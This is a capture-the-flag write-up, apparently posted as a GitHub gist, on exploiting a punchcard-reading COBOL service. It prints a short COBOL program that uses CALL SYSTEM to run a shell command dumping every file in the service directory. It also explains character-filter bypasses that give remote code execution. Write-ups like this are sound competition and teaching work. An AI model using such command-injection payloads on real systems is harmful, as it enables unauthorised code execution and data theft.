Skip to content

Instantly share code, notes, and snippets.

@Tehada

Tehada/punchy.md

Created May 27, 2019 10:26
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Tehada/52841552a14c9ac59d5017a1ab7969fb to your computer and use it in GitHub Desktop.
Save Tehada/52841552a14c9ac59d5017a1ab7969fb to your computer and use it in GitHub Desktop.
Download ZIP
punchy writeup
Raw
punchy.md

We analyzed source code on python and observed these key points:

First, we will describe you our solution and then we will provide more details on how we created it.

Solution

We generated a sequence of punchcards with encoded cobol exploit on them -- one line of code on each card, also some tabulation was required to bypass sintax errors which cobol generated. Exploit itself is pretty simple:

       IDENTIFICATION DIVISION.                                                 
       PROGRAM-ID. HELLO.                                                       
       PROCEDURE DIVISION. BEGIN.
       CALL >SYSTEM> USING
       FUNCTION LOWER-CASE(>FIND . -TYPE F -EXEC CAT {} \;>). STOP RUN.

To send this script we generated 5 punchcards for each line. Script shows us contents of each file in service's directory. Using this script we basically have rce and can do much more stuff than simply printing file contents.

To generate valid punchcard we used this script.

(can be found by simply googling "python generate punchcard")

Now more details:

Most important things which helped us to solve the task:

  • http request which organisators sent to store flags. In traffic we found these things:

** image of valid punchcard, which service can handle without error

** text which was encoded in these punchcards -- it was on html page with uploads, where user can join some pieces and then run them. There we just saw this type of code:

       IDENTIFICATION DIVISION.                                                 
       PROGRAM-ID. FLAG.                                                        
       DATA DIVISION. WORKING-STORAGE SECTION. 01 FLG.                          
       05 FLGBASE32A PIC X(32) VALUE "IZAVKU2UL5ME63DWOBEVSQSTJNCFETLX".        
       05 FLGBASE32B PIC X(32) VALUE "IFAUCQKEIREDK5CEIJHDSSCSKZGEC===".        
       PROCEDURE DIVISION. BEGIN. DISPLAY FLG. STOP RUN.

This code was sent in punchcards one line on each card.

Flag consists of two base32 encoded parts on lines 4 and 5. We determined that this code for cobol programming language. Then we just wrote our exploit on cobol. It is worth mentioning that after uploading image and before executing the cobol code itself, some internal transformation of input happens (in .so files), namely some characters were discarded (like lowercase letters), some characters were translated into others and some characters just generated error on server. Emperically we found that character < translates into ". Problem with dropped lowercase letters we solved by using cobol's funcion LOWER-CASE on our shell command.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment